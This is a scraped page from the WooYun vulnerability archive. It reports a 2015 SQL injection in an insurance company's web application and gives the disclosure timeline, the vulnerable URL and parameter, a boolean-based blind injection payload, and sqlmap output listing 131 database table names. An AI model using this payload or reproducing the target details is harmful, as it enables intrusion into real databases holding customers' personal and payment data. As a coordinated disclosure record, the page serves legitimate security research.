乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
http://insurance.noahwm.com/preSysApp/newSalesN/getCode.jsp?CodeType=bankcode
sqlmap resumed the following injection point(s) from stored session:---Parameter: CodeType (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: CodeType=bankcode' AND 8336=8336 AND 'OyPF'='OyPF---web application technology: JSPback-end DBMS: OracleDatabase: JSPGOU[131 tables]+-----------------------------+| AGENTBINDING || DH_PREMIUM_NETS || ECORDER || ECORDER_20150716 || ECUSER || GTSY_PREMIUM_NETS || JC_ADDRESS || JC_CORE_ADMIN || JC_CORE_COUNTRY || JC_CORE_GLOBAL || JC_CORE_MEMBER || JC_CORE_MESSAGE_TPL || JC_CORE_PERMISSION || JC_CORE_SOLUTION || JC_CORE_USER || JC_CORE_WEBSITE || JC_DATA_BACKUP || JC_INDUSTRY || JC_INFORMATION || JC_QQ || JC_SHOP_ADMIN || JC_SHOP_ADVERTISE || JC_SHOP_ADVERTISE_ATTR || JC_SHOP_ADVERTISE_SPACE || JC_SHOP_ARTICLE || JC_SHOP_ARTICLE_CONTENT || JC_SHOP_BRAND || JC_SHOP_BRAND_TEXT || JC_SHOP_BUSINESS || JC_SHOP_BUY_TYPES || JC_SHOP_CARDGIFT || JC_SHOP_CART || JC_SHOP_CART_ITEM || JC_SHOP_CATEGORY || JC_SHOP_CHANNEL || JC_SHOP_CHANNEL_CONTENT || JC_SHOP_CHILDRENAGES || JC_SHOP_COLLECT || JC_SHOP_CONFIG || JC_SHOP_CONSULT || JC_SHOP_COUPON || JC_SHOP_DICTIONARY || JC_SHOP_DICTIONARY_TYPE || JC_SHOP_DISCUSS || JC_SHOP_FREIGHT || JC_SHOP_FREIGHT_COUNTRY || JC_SHOP_GIFT || JC_SHOP_HABITS || JC_SHOP_HABSTATUS || JC_SHOP_KEYWORD_Q || JC_SHOP_MEMBER || JC_SHOP_MEMBERCOUPON || JC_SHOP_MEMBER_ADDRESS || JC_SHOP_MEMBER_BUYTYPES || JC_SHOP_MEMBER_CHILDRENAGES || JC_SHOP_MEMBER_GROUP || JC_SHOP_MEMBER_HABITATIONS || JC_SHOP_MEMBER_HABITS || JC_SHOP_ORDER || JC_SHOP_ORDER_ITEM || JC_SHOP_PAY || JC_SHOP_PAYMENT || JC_SHOP_PCATEGORY_BRAND || JC_SHOP_POSTER || JC_SHOP_PRODUCT_EXT || JC_SHOP_PRODUCT_FASHION || JC_SHOP_PRODUCT_KEYWORD || JC_SHOP_PRODUCT_TEXT || JC_SHOP_PTYPE || JC_SHOP_PTYPE_BRAND || JC_SHOP_PTYPE_PROPERTY || JC_SHOP_SHIPPING || JC_SHOP_TAG || JORDERMESSAGE || LCAPPNT || LCBNF || LCCONT || LCDUTY || LCGET || LCINSURED || LCPOL || LDADDRESS || LDCODE || LDCODEMAPPING || LDCOM_MANAGE || LDMAXNO || LDSYSVAR || LMDUTY || LMDUTY_0821 || LMFIXWRAP || LMPLANWRAP || LMPLANWRAP_0821 || LMRISK || LMRISK_EXT || NSAPPLICANTCONFIG || NSBENEFICIARYCONFIG || NSCONFIG || NSCONTROL || NSINSAGETOAMOUNT || NSINSAGETOTIMES || NSINSURANCEINFORM || NSMANAGECOM || NSPICTURECONFIG || NSPINSUREDCONFIG || NSPRODUCTCONFIG || NSPRODUCTDESCRIB || NSPRODUCTDETAIL || NSPRODUCTDUTY || NSPRODUCTINFO || NSPRODUCTINFO_0807 || NSPRODUCTRULES || NSPRODUCTTERMS || NSRINSUREDCONFIG || PAP_TARGETOBJECT || PAYONLINE || PROVINCE || REFER_USER || RT_JYRS_AMNT || SD_PREMIUM_NETS || TK_RATE_40 || TRADEINFO || TRADELOG || USERCONTBINDING || USERRANDCODE || WEIGHTSCOPE || WSCONFIGURE || WSDEALCLASSMAPPING || WSDEALCLASSMAPPING_0821 || WSDEALCLIENTMAPPING || WSDETAILLOG || WSDETAILLOGB |+-----------------------------+
危害等级:中
漏洞Rank:8
确认时间:2015-11-24 13:12
感谢对我公司信息安全的支持
暂无